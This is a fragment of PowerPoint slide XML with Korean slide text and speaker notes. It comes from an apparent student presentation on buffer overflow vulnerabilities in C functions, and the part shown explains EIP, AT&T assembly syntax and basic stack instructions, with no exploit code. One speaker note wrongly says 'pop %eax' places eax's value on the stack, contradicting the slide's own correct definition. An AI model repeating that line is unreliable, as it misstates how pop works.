              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그냥 함수의 시작 주소가 저장되는 곳이라 생각하시면 됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>인스트럭션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 레지스터는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>밖에 없습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 사용자가 임의로 수정할 수 없습니다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EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에는 다음에 실행할 명령어가 저장된 메모리 주소가 저장되어 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현재 명령어가 모두 실행되면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 저장되어 있는 명령어 주소를 따라가 그 명령어를 실행합니다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3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BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격을 하기 위해 프로세스의 실행 과정을 알아야 하고 프로세스의 실행 과정을 알기 위해선 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Code segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 내부의 명령어를 해석해야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>code segment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>내부의 명령어는 모두 기계어로 이루어져 있어 해석하기 굉장히 난해합니다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이 기계어를 좀 더 이해하기 쉬운 코드로 나타낸 것이 어셈블리어입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>어셈블리어는 기계어와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>로 대응되어 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>어셈블리 명령어는 다음과 같이 라벨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>명령어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 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오퍼랜드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a: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오퍼랜드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>설명문으로 이루어져 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오퍼랜드는 명령어의 대상을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어셈블리어에는 크게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>문법과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>AT&amp;T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>문법이 있는데 저는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>AT&amp;T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>방식을 기준으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>설명드리겠습니다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보통 제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오퍼랜드가 연산의 대상이 되며 이 명령어의 뜻은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>레지스터에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>레지스터를 넣겠다는 의미입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이렇게 레지스터의 앞에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 붙이고 상수 앞에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 붙입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오퍼랜드가 하나만 있는 명령어도 있고 오퍼랜드가 하나도 없는 명령어도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이제 이번 발표에 꼭 필요한 어셈블리 명령어를 살펴보겠습니다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7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발표에 사용할 명령어들입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 오퍼랜드에 있는 값을 스택 상위에 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 그 크기만큼 감소합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>은 스택의 가장 상위에 있는 값을 꺼내서 오퍼랜드에 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 그 크기만큼 증가합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오퍼랜드가 가리키는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>주소값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오퍼랜드에 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오퍼랜드에서 제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>오퍼랜드값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>빼줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>은 함수를 호출하는 명령어 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 함수의 종료 시 사용되며 함수의 에필로그 작업을 해주는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>명령어어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>은 함수의 종료 시 사용되며 함수를 호출했던 다음 지점의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>주소값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 넣어줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>즉 그 지점의 명령부터 마저 실행하도록 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오퍼랜드에 제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오퍼랜드 값을 넣어줍니다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r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>중요한 명령어 몇가지를 메모리 구조와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>연관지어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 이해해보도록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7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앞서 설명한 것과 같이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>프로세스는 스택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코드 영역으로 구분되어집니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>어셈블리어는 이 코드 영역의 기계어를 해석한 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 이제 어셈블리 명령어의 실행 결과를 메모리의 변화를 통해 직접 살펴보겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그런데 스택의 구조가 특이합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. ESP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>스택 포인터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 스택의 맨 끝 주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>높은 주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 가리킵니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 스택의 입출력 방향은 아래 방향입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 일반적인 스택이 거꾸로 뒤집혀 있다고 생각하시면 됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pop %eax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 실행하면 스택 상위에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 값이 들어갑니다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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 그만큼 감소하게 되고 다시 스택의 상위 주소를 가리키게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4CA260-A431-4C7C-BE37-9568EA670A35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6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4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3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7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2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8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3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1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 레이아웃_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 레이아웃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63B2-1F94-4D96-ACAB-40FB91153B1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4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04058" y="3308496"/>
            <a:ext cx="8041009" cy="1223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700" spc="227">
                <a:solidFill>
                  <a:srgbClr val="30302A"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어 ExtraBold"/>
                <a:ea typeface="나눔스퀘어 ExtraBold"/>
              </a:rPr>
              <a:t>BufferOverflow 공격을 이용한 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr lang="ko-KR" altLang="en-US"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3700" spc="227">
                <a:solidFill>
                  <a:srgbClr val="30302A"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어 ExtraBold"/>
                <a:ea typeface="나눔스퀘어 ExtraBold"/>
              </a:rPr>
              <a:t>C언어 함수의 취약점 탐구 및 대안 제시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229" y="4583760"/>
            <a:ext cx="167866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rgbClr val="6E6F71"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어"/>
                <a:ea typeface="나눔스퀘어"/>
              </a:rPr>
              <a:t>프로젝트 결과 발표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500">
              <a:solidFill>
                <a:srgbClr val="6E6F71"/>
              </a:solidFill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en-US" altLang="ko-KR" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6E6F71"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어"/>
                <a:ea typeface="나눔스퀘어"/>
              </a:rPr>
              <a:t>-EC 28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6E6F71"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어"/>
                <a:ea typeface="나눔스퀘어"/>
              </a:rPr>
              <a:t>기 황인서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6E6F71"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어"/>
                <a:ea typeface="나눔스퀘어"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="6E6F71"/>
              </a:solidFill>
              <a:latin typeface="나눔스퀘어"/>
              <a:ea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5610" y="3000719"/>
            <a:ext cx="166840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EC 2018 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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"/>
                <a:ea typeface="나눔스퀘어"/>
              </a:rPr>
              <a:t>Cevelop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="나눔스퀘어"/>
              <a:ea typeface="나눔스퀘어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4660" b="20690"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202608" y="764759"/>
            <a:ext cx="1720731" cy="12845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9531D69D-93AF-4F00-A1D3-C1B2BBCCB94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="116397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/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>스택의 가장 상위에 있는 값을 꺼내서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 그 크기만큼 증가한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="240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03D21B-84A6-4B8F-80A3-157E485C843D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4305300" y="2091190"/>
            <a:ext cx="2575340" cy="2713720"/>
            <a:chOff x="6553200" y="1305446"/>
            <a:chExt cx="2575340" cy="271372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93934A-DF44-45DA-8F1D-C7A8DA358EA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6633507" y="1305446"/>
              <a:ext cx="2414726" cy="2637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FA8BC7-71AC-4E36-8049-222100FDF327}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6553200" y="3833881"/>
              <a:ext cx="2575340" cy="185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E8ED58-8798-44D2-B70B-3CF489C4BDE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6880640" y="2181465"/>
            <a:ext cx="860963" cy="61584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66B679-0A74-40B2-95D4-F2FCE854CC26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4385607" y="2091189"/>
            <a:ext cx="2414726" cy="398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8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6.25E-7 -0.058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9531D69D-93AF-4F00-A1D3-C1B2BBCCB94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="104855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/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sub   $0x8, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>esp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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 값에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>빼준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>스택이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>바이트 확장되었다는 의미</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
